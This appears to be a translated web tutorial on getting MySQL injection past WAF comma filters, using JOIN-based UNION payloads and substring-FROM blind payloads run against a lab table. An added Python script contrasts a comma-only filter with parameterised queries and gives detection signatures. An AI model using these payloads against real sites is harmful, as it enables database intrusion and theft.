SQL injection tricks: bypassing comma filtering in union-based and blind injection, explained in detail
<p><span><strong>Preface</strong></span></p>
<p>
SQL injection was a very common vulnerability a long time ago. As security standards improved it became much rarer, yet even today many websites are still running with SQL injection flaws. This article covers bypassing comma filtering in SQL injection and is shared here for reference and study. Without further ado, let's look at the details.</p>
<p>
<span><strong>1. Bypassing the comma in union-based (visible) injection</strong></span></p>
<p>
In a union query, the form UNION SELECT 1,2,3,4,5,6,7..n is used to find which columns are displayed. That statement contains several commas, so if a WAF blocks commas, the union query can no longer be used as written.</p>
<p>
<strong>Bypass</strong></p>
<p>
Substitute the usual injection variables or other statements at the display positions, but express them without commas.</p>
<div class="jb51code">
<pre><code class="sql">union select 1,2,3;

union select * from ((select 1)A join (select 2)B join (select 3)C);

union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);
</code></pre>
</div>
<p>
Demonstrating the union query inside the database</p>
<p>
Everything from UNION onward is the statement we would inject through the URL; this is only a demonstration. In practice, a comma in the injected statement may be blocked.</p>
<div class="jb51code">
<pre><code class="sql">mysql&gt; select user_id,user,password from users union select 1,2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.04 sec)
</code></pre>
</div>
<p>
Injecting with JOIN so that no comma appears</p>
<div class="jb51code">
<pre><code class="sql">mysql&gt; select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select 3)C);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)
</code></pre>
</div>
<p>
Querying the data we actually want</p>
<div class="jb51code">
<pre><code class="sql">mysql&gt; select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);
+---------+-------+-------------------------------------------------+
| user_id | user  | password                                        |
+---------+-------+-------------------------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99                |
|       1 | 2     | root@192.168.228.1 dvwa c:\phpStudy\MySQL\data\ |
+---------+-------+-------------------------------------------------+
2 rows in set (0.08 sec)
</code></pre>
</div>
<p>
<span><strong>2. Bypassing the comma in blind injection</strong></span></p>
<p>
The MID and SUBSTR functions extract characters from a text field; in their usual three-argument form they need commas.</p>
<div class="jb51code">
<pre><code class="sql">mysql&gt; select mid(user(),1,2);
+-----------------+
| mid(user(),1,2) |
+-----------------+
| ro              |
+-----------------+
1 row in set (0.04 sec)
</code></pre>
</div>
<p>
Querying the ASCII code of the first character of the database user name</p>
<div class="jb51code">
<pre><code class="sql">mysql&gt; select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|     114 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)
</code></pre>
</div>
<p>
Blind injection: guessing the ASCII value, one comparison per request</p>
<div class="jb51code">
<pre><code class="sql">mysql&gt; select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115) ;
Empty set

mysql&gt; select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114) ;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.04 sec)
</code></pre>
</div>
<p>
Bypassing the comma with the SUBSTRING function</p>
<blockquote>
<p>
substring(str FROM pos)</p>
</blockquote>
<p>
Returns the substring of string str that starts at position pos; this form needs no comma.</p>
<div class="jb51code">
<pre><code class="sql">mysql&gt; select substring('hello' from 1);
+---------------------------+
| substring('hello' from 1) |
+---------------------------+
| hello                     |
+---------------------------+
1 row in set (0.04 sec)

mysql&gt; select substring('hello' from 2);
+---------------------------+
| substring('hello' from 2) |
+---------------------------+
| ello                      |
+---------------------------+
1 row in set (0.03 sec)
</code></pre>
</div>
<p>
Injection</p>
<div class="jb51code">
<pre><code class="sql">mysql&gt; select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114) ;
Empty set
-- substring(user() from 2) starts with 'o'
-- ascii('o') is 111
mysql&gt; select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111) ;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.03 sec)
</code></pre>
</div>
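<p>
As an added example (not code from the original article), the Python script below uses an in-memory SQLite table to show what both sections above mean for defenders: a WAF rule that only rejects commas lets the join-based UNION payload and the substring(str FROM pos) blind payload straight through, while a parameterised query neutralises the same input; it also carries detection signatures for the comma-free forms. The table contents, the helper names and the signatures are assumptions; user() and ascii() are MySQL functions, so the blind payload is only run through the detector, not against SQLite.</p>

```python
import re
import sqlite3

# Constructed sample data, not from the original article: a minimal users table
# with the three columns the article queries.
SAMPLE_ROWS = [(1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99")]

# The comma-free payloads shown in the article: the join-based UNION form and
# the substring(str FROM pos) blind-injection form.
JOIN_PAYLOAD = "1 union select * from ((select 1)A join (select 2)B join (select 3)C)"
BLIND_PAYLOAD = "1 and (ascii(substring(user() from 2))=111)"


def setup_db():
    """In-memory SQLite stand-in for the article's MySQL 'users' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (user_id integer, user text, password text)")
    conn.executemany("insert into users values (?, ?, ?)", SAMPLE_ROWS)
    return conn


def naive_comma_filter(value):
    """A WAF rule that only rejects commas; returns True when the input is allowed.
    This is exactly the control the article's payloads walk around."""
    return "," not in value


def vulnerable_lookup(conn, user_id):
    """'Before' pattern: untrusted input concatenated into the SQL text."""
    sql = "select user_id, user, password from users where user_id = " + user_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id):
    """'After' pattern: the value is bound as a parameter and never parsed as SQL,
    so the same payload is merely compared against user_id as a string."""
    sql = "select user_id, user, password from users where user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


# Detection signatures (assumed, for a log search or WAF rule set) covering the
# comma-free variants that a plain comma blocklist says nothing about.
COMMA_FREE_SIGNATURES = {
    "join_union": re.compile(r"\bunion\b.*\bselect\b.*\bjoin\b", re.I | re.S),
    "substring_from": re.compile(r"\bsubstring\s*\(.*\bfrom\b", re.I | re.S),
    "char_oracle": re.compile(r"\bascii\s*\(\s*(mid|substr|substring)\s*\(", re.I),
}


def detect_comma_free_injection(value):
    """Return the names of the signatures a request value matches (empty if clean)."""
    return [name for name, pat in COMMA_FREE_SIGNATURES.items() if pat.search(value)]


if __name__ == "__main__":
    conn = setup_db()
    # The comma filter allows both payloads, yet each is flagged by a dedicated signature.
    for payload in (JOIN_PAYLOAD, BLIND_PAYLOAD):
        print("comma filter allows:", naive_comma_filter(payload),
              "| signatures:", detect_comma_free_injection(payload))
    # Only the join payload is valid SQLite, so only it is run against the table.
    print("vulnerable rows:", vulnerable_lookup(conn, JOIN_PAYLOAD))
    print("parameterised rows:", safe_lookup(conn, JOIN_PAYLOAD))
```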
<p>
<span><strong>Summary</strong></span></p>
<p>
That is all for this article. I hope its content is of some reference value for your study or work; if you have questions, feel free to leave a comment. Thank you all for your support.</p>
<p>
Original article: http://www.cnblogs.com/hackxf/p/9490534.html</p>